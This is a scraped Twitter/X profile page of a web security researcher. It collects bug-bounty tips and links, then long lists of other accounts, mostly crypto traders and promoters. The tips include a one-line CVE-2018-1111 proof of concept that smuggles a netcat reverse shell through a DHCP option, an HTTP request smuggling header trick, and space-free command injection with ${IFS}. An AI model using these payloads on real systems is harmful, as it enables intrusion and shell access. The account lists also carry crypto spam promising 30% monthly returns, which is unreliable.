xk0n @xk0n_
web security researcher Joined November 2014-
Tweets53
-
Followers23
-
Following757
-
Likes220
使用欧易 Web3 钱包,快人一步免费领取 Moca ID ! okx.com/cn/web3/gamefi… #OKX #GameFi #Mocaverse #OKXGameFi
If you perform SAML auth in Java you should make sure you patched bugs.chromium.org/p/project-zero…. RCE during signature verification. Blogpost coming soon™.
New: curl -s "crt.sh/?q=%25.tesla.c…" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew @b51b5b43 @Jhaddix @stokfredrik @TomNomNom
I found another way to do HTTP smuggling, you can use T-E: chunKed K is the Kelvin symbol (%E2%84%AA) If the header is converted to lowercase, you get 'chunked' in ascii, if it's converted to uppercase it will stay the same (invalid) cc @albinowax
It turns out nearly 300 executables in your System32 folder are vulnerable to relative path DLL Hijacking. Did you know that with a simple VBScript some of these EXEs can be used to elevate such executions, bypassing UAC entirely? Full blog post here 👉 wietze.github.io/blog/hijacking…
Reproduced CVE-2020-10199 Nexus Repo Manager RCE with @rootxharsh securitylab.github.com/advisories/GHS… states that this is an auth'd RCE. However, on the version, we tested i.e. 3.21.0-05, the payload is executed before the authentication check AKA pre-auth RCE //cc: @pwntester
We (w/ @__hach_) found a vulnerability in Kubernetes: - CVE-2020–8555 - +40K$ crazy bounties - Really cool stuff about exploitation on BIG Bug Bounty programs Read more here: medium.com/@BreizhZeroDay…
You asked for something about OAuth — we did. Here is a mindmap about hacking OAuth 2.0. We tried to cover all possible ways even with low impact. Our inspiration was homakov.blogspot.com/search?q=oauth Thanks to @homakov for outstanding articles. #BugBountyTip #CyberSecurity #BugBounty
.@NahamSec you asked me yesterday about how to learn deserialization attacks - So...
Mobile Application Pentesting : Part 1:- medium.com/@patilpiyush/m… Part 2:- medium.com/@patilpiyush/m… Part 3:- medium.com/@patilpiyush/m… Part 4:- medium.com/@patilpiyush/m… Part 5:- medium.com/@patilpiyush/m… Part 6:- medium.com/@patilpiyush/m…
- Execute bash commands without spaces with two methods: 1- {ping,-c,1,127.0.0.1} 2- ping${IFS}-c${IFS}1${IFS}127.0.0.1 - terminal will translate ${IFS} into a space Thanks @ippsec
Red Team: Do you know what data your offensive operations are leaking via TLS negotiations? Neither did I until a friend showed me. Blue Team: Good blocking & detection potential. Worth your interest! Start here: github.com/salesforce/ja3 Thanks @haroldogden!
List of bug bounty writeups pentester.land/list-of-bug-bo…
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat
dnsdb.io has tons of domain data for your pentesting needs :)
Bad-PDF create malicious PDF to steal NTLM Hashes from windows machines, it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener. This method work on all PDF readers(… ift.tt/2I58Ydk
Happy to announce the release of our first awesome-list: Awesome Firmware Security. github.com/PreOS-Security…
LetitiaSenior @66YQdu2XC4yqi
14 Followers 863 Following
Jocelyn @Uglooardax7727
33 Followers 2K Following The question isn’t who’s going to let me; it’s who’s going to stop me.
James Carlisle @SharonKlei38199
1 Followers 72 Following Weekly selection of high-quality stocks. 30% monthly return rate Free 2-month trial Click the link to join us:https://t.co/2NMVKF5QM1
Echo @Noti_CoFounder
221 Followers 4K Following The Thinker | The Sniper | The Visionary | CEO & CPO @noti_official | Crafting the future of token sniping.
🚖X·H·C线下应�... @xhcminibus
234 Followers 4K Following 🛵小黄车,“骑”出你的style! 🥇奢享版:尊贵加倍,爽到起飞 | 🥈轻享版:省钱实惠,乐趣不退 | Telegram频道,等你来嗨⤵️ https://t.co/upu1fNLOOG
Robert Beltran @rbeltran
991 Followers 770 Following #ProdSec/#AppSec Engineering Manager keeping you safe from insecure code
扛杆币知识汇总... @huyi88084998
22 Followers 526 Following 【币圈顶流众筹社群】 更新各大付费群信息,汇集了众多大佬的付费社群内容 助您用最少的代价了解最多最全的币圈顶级付费社群内容 白嫖勿扰! 感兴趣的加VX,具体看置顶推文 #区块链 #以太坊 #币安
比特币炒币不赚... @BtBNFTjuniu69
390 Followers 4K Following #DEFI #AVAX #NFT 加微信,立即免费获取2天超过30条全球币圈顶级付费内容 【巨牛币合买社群】汇集价值约20万人民币付费社群内容,包括nansen数据分析、 #头等舱研报、#本末区块、#蓝狐笔记、区块链三刀、零X干货铺、掘金之路、#德妃耕田 等。全球币圈最优质社群我们都有 #区块链 #FTM
Juzo @b0x_in
1K Followers 6K Following
gabriel lawrence @gebl
2K Followers 3K Following mastodon: https://t.co/Cn4uf9OJdY #BlackLivesMatter #StopSystemicOppression he/him
What_i_think @See_what_i_thnk
15 Followers 127 Following Passion for Infosec, bass fishing and motorcycles
cr0@Defensive-Securit... @cr0nym
3K Followers 2K Following Focus on Linux/Kubernetes Attack/Detection/Forensics/Incident Response/Threat Hunting/Active Defense. Learning hard every single day.
LurkingMedia @lurking_media
477 Followers 2K Following #Hacktivist,#Activist, #DeplorableBitches, #media, #lurkingmedia,#lurking, #BugBounty,#HackThePlanet, #HackersGonnaHack, #HackersOne:)
24X7Fe @24x7Fe
911 Followers 3K Following News, technology, and fun for the connected generation. Tweets by @24x7Fe staff.
mustacheBiz @mustacheBiz
397 Followers 3K Following Producimos artículos, ensayos y podcast para el emprendedor empedernido. Temas: #leanstartup #growthmarketing #customerdevelopment y #leanproductmanagement.
Hunter ExploitKit @hunter_exploit
1K Followers 1K Following Official page account sales and Technical Support XMPP : [email protected]
Terra Lucas @TerraLucas10
164 Followers 818 Following
図解女体の神秘 @LeonieGripper
185 Followers 678 Following
女性恐怖症@ゆ�... @lostforest19
130 Followers 658 Following あなたがコミュ障でも全く関係ありません!会話力ゼロでも相思相愛の彼女ができる方法! よろしければブログをご覧下さい!http://t.co/WdeFuYVuQr
炉 @strangewomandcl
357K Followers 220 Following 爱灼烧我疲惫不堪的胸膛//唯一备用号@YouKnowDu//🚪298vx+tg直接发口令红包和微信号//不接推广//别给我汇报盗图和视频了我全平台只有这一个号
MoonPay 🟣 @moonpay
241K Followers 19K Following Proudly helping millions of people onramp and offramp to crypto since 2019
Hyperliquid @HyperliquidX
327K Followers 7 Following The blockchain to house all finance. Trade, build apps, and launch tokens on the same hyper-performant chain. X by Hyper Foundation
Kittenswap (🐱,🐱... @KittenswapHype
8K Followers 284 Following Kittenswap is a community owned DEX on HyperEVM with ve(3,3) mechanics! Join us https://t.co/4pDGUR4GY4
HyperSwap @HyperSwapX
25K Followers 9 Following First @HyperliquidX EVM native AMM DEX and Liquidity Hub 👀
Unit @hyperunit
32K Followers 3 Following
야살 / Yasal @Yasal_170
807K Followers 582 Following 🇰🇷 Cosplayer || ZEN Creative | RZ Cos | RZ Heroes Business : [email protected]
币圈慈善家 @cryptocishanjia
298K Followers 2K Following Trader,Investor,理性,不构成投资建议。 阿奶,你一定可以的!华语Top1的meme交易平台https://t.co/CUU2jfYanc 新人首选OKX,安全简单 https://t.co/9Whl44E5hC 近3亿用户的共同选择,就在币安|https://t.co/vs6TcdYute
Veronica @VeronicaPump
11K Followers 2K Following Degen / 小号重开 / NFA / 每天扫链16小时 All in Meme / 知行合一 / 私信找我聊天默认我可以截图发出来 / 不要跟我的操作,没有投资建议,不发卖点 / $SOL Maxi
九条命 @CryptoKobe92
29K Followers 539 Following 勇敢一点,一定要勇敢一点|用下面这个打狗工具,让你跟我一样拥有九条命:https://t.co/zVTHN5twG1|OK钱包邀请码:YIQIFACAI999(返佣全部自动返给你们)https://t.co/W5Lut3ntCl
Ansem @blknoiz06
768K Followers 9K Following coldest nigga breathing | trading @BullpenFi | poker @PlaySOPO | gambling @luckio | creator/DMs @timedotfun | all other clone accounts are scams
HORSE 🏴☠️ @TheFlowHorse
274K Followers 4K Following Former prop turned pajama trader. Girl dad and husband of one of those wild horse girls • Burn the ships.🇺🇸⚔️Sweeping the book in the @tradingstable
//Bitcoin 𝕵ack �... @BTC_JackSparrow
269K Followers 1K Following |+| I'll eat when I'm hungry #Bitcoin |+| Magic @thestorecloud //
Alex Krüger @krugermacro
215K Followers 2K Following 🇦🇷 Economist. Trader. Advisory. Sharing views on crypto and global markets.
Bob Loukas 🗽 @BobLoukas
356K Followers 443 Following Position Trader, Entrepreneur, Family Man, Fullfilled. Omnia mea mecum porto.
adam @abetrade
192K Followers 287 Following often wrong, never false. education at https://t.co/zK8xP4YHM5 part of @breakoutprop
Byzantine General @ByzGeneral
239K Followers 597 Following Cartoon tiger pressing buttons. Advisor @Velo_xyz TG: https://t.co/Vr8VYHAkvm
loomdart - Holy War A... @loomdart
324K Followers 17K Following combatting modern addictions @loomlocknft don't check x dm's use telegram https://t.co/lctDOfrMmf not angel, not KOL, not investing, go away
IamNomad @IamNomad
227K Followers 2K Following
Tuur Demeester @TuurDemeester
308K Followers 3K Following Host of @BReelPod. Board @TXBitcoinFound, advisor to @Blockstream, @Unchained, @AnchorWatch.
Murad 💹🧲 @MustStopMurad
740K Followers 8K Following Crypto Analysis. Stop Trading & Believe in #SPX6900 TikTok @MustStopMurad YouTube @MustStopMurad Telegram @MustStopMurad Instagram @ MuradCrypto Past @Princeton
magnolia @0xmagnolia
61K Followers 5K Following ᴍᴀᴋᴇ ᴀʟᴛᴄᴏɪɴs ɢʀᴇᴀᴛ ᴀɢᴀɪɴ!!! ɪꜰ ʏᴏᴜ'ʀᴇ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ ᴀʟᴘʜᴀ ᴏɴ ʙʟᴜᴇ ᴄʜɪᴘ https://t.co/epT68ZQrQq
Phyrex @Phyrex_Ni
348K Followers 5K Following 4XLABS 辅导全球Web3项目落地华语市场 只是个搬砖的,偶尔恰饭 不奢求,不浪费 GlassNode 重度使用者 没有群也不收费,所有分析回答均不构成投资建议 近3亿用户共同选择Binance:https://t.co/JukzSnpfwD Crypto入口OKX就够了:https://t.co/vPOAfIjmpB 做有温度的Bitget:https://t.co/VZ8RxZe5N7
BlockSec @BlockSecTeam
27K Followers 146 Following Smart Contract Audit | Security Monitoring | AML/CFT (KYA/KYT) | Crypto Investigation | @Phalcon_xyz @MetaSleuth @MetaDockTeam 👉TG: https://t.co/owokTLanv5
23pds (山哥) @im23pds
14K Followers 6K Following Dad/@SlowMist_Team Partner&CISO/#Web3 Security Researcher/RedTeam/Pentester/Ai安全猎人 #bitcoin
felixhsu @Felix_Hsu
14K Followers 154 Following Trader, entrepreneur, geek, fake coder and real Scuderia Ferrari fan.
PeckShieldAlert @PeckShieldAlert
92K Followers 1 Following Free Chrome Extension: https://t.co/yvXOjS8ZRI Telegram: https://t.co/qX5sVtdkFD
Shib @Shibtoken
3.9M Followers 44 Following Official Twitter of the Shiba Inu Ecosystem $SHIB, $BONE, #SHIBOSHIS, #SHEBOSHIS and $TREAT!
The Data Nerd @OnchainDataNerd
72K Followers 528 Following On a mission to make onchain data digestible
B² Network | Scaling... @BSquaredNetwork
432K Followers 325 Following Put Bitcoin in Every AI Agent’s Wallet | Scaling BTC from Store of Value to Practical Utility | $B2 for governance & rewards https://t.co/IveK1dVurK
Delphi Digital @Delphi_Digital
212K Followers 1K Following A research-driven firm dedicated to making crypto happen sooner and better than it would without us.
Banana Gun 🍌🔫 @BananaGunBot
101K Followers 48 Following The best trading bot, built by on-chain traders. ETH | SOL | BASE | BNB | SONIC | UNI Only @BananaGunBot is real, watch out! https://t.co/TNB8wS4dX5
pepe boost @PepeBoost888
90K Followers 1K Following Telegram trading bot designed by data scientists 🧑🔬 Co-Founder of @useXXYYio #Solana bot🤖 https://t.co/yoAtQeJ9xV
Arthur Hayes @CryptoHayes
741K Followers 25 Following Arthur Hayes, Co-Founder of BitMEX & CIO @Maelstromfund
Lilyanna 比特里里... @lilyanna_btc
28K Followers 1K Following 专注比特币生态,Ordinals/Runes/Atomicals, Merlin Chain 生态及各类创新协议的研究和科普
Starknet @Starknet
346K Followers 697 Following Shaping the future with scale and integrity. X run by community member @Starkwareltd
Magic Eden 🪄 @MagicEden
828K Followers 3K Following The best place to trade all assets onchain | https://t.co/TM8CKG6p4R | Posts not intended for US or UK audiences
Yi He @heyibinance
434K Followers 1K Following Co-Founder & Chief Customer Service Officer @Binance Holder of #BNB
Perimeter @perimeter_sec
423 Followers 8 Following Industry leading security services specialized in fuzzing, securing DeFi's largest protocols
lourens @LourensLinde
630 Followers 1K Following Finding bugs in smart contracts @OpenZeppelin. Prev Fuzzing Dev @getreconxyz. Only my own opinions here.
codingsh 👨🏾�... @codingsh
1K Followers 6K Following Serial Founder, Blockchain architect , King of Dance, Opensource Maxi
m4rio @m4rio_eth
3K Followers 666 Following Lead Security Researcher and meme lord @cantinaxyz! | EVM, Solana, Rust | Building https://t.co/RpwO9jNyX7 first solidity package manager
Zellic @zellic_io
16K Followers 15 Following Security reviews and research that keep winners winning. We apply unmatched hacking talent to secure critical software for the most innovative teams.
Adrian ⛩️ Hetman ... @adrianhetman
7K Followers 3K Following Head of Triaging @immunefi 🛡️⚔️ Crypto, & analog life | Journals, watches, and personal growth | Sharing what works (and what doesn’t)—join the journey.
chrisdior.eth @chrisdior777
9K Followers 5K Following Co-founder @CDSecurity_ Helping protocols avoid multi-million dollar losses TG - https://t.co/KeUJFoKZwrTrends for United States
You might like
